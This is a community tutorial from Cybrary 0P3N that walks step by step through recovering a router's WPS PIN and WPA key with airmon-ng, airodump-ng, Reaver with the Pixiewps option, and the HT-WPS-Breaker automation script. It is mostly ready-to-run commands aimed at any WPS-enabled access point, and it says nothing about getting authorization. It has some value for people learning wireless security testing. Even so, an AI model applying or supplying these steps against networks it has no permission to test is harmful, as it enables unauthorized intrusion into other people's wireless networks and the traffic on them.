This Cybrary 0P3N submission will cover how to use tools such as aircrack suite, Reaver, Pixiewps, & HT-WPS#B to exploit a WPS vulnerability in certain routers.This attack is carried out on a Machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B).Here is a list of vulnerable routers:Spreadsheet of Routers Vulnerable to WPS ExploitTo start, open a terminal as root and run the following commands. apt-get updateapt-get install reaver aircrack-ng Once you have ran the following commands, we will use airmon-ng to set our wireless card into monitor mode. (Must have a wireless card capable of packet injection)First we will check for any interfering processes by using the following command. airmon-ng check If processes were found, use the following command to kill them. airmon-ng check kill Now to set the card to monitor mode. airmon-ng start wlan0 Next we will use airodump-ng to scan for wireless access points with WPS enabled. airodump-ng wlan0mon --wps Once airodump has found the AP you are attacking, press ctrl+C to stop, then copy down the BSSID & Channel#.Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP. reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1 -i specifies the interface used-c specifies the channel of the AP. Replace# with the channel number.-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.You can also time the reaver process by using the following command. time reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1 If successful, the WPS pin will be passed to reaver and the WPA key will be discovered. Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.
Using HT-WPS-Breaker to automate the process. To install, CLICK HERE then drag the .zip to your desktop and run the following commands.
- cd Desktop
- unzip HT-WPS-Breaker-master.zip
- cd HT-WPS-Breaker-master
- chmod +x HT-WB.sh
- ./HT-WB.sh or bash HT-WB.sh
This concludes a simple write up of how to use Reaver and other tools to attack a WPS enabled AP.I have had many questions on how to use Reaver so I hope this helps.Comment below if you have any questions. (Please keep comments in regards to the topic).~Evox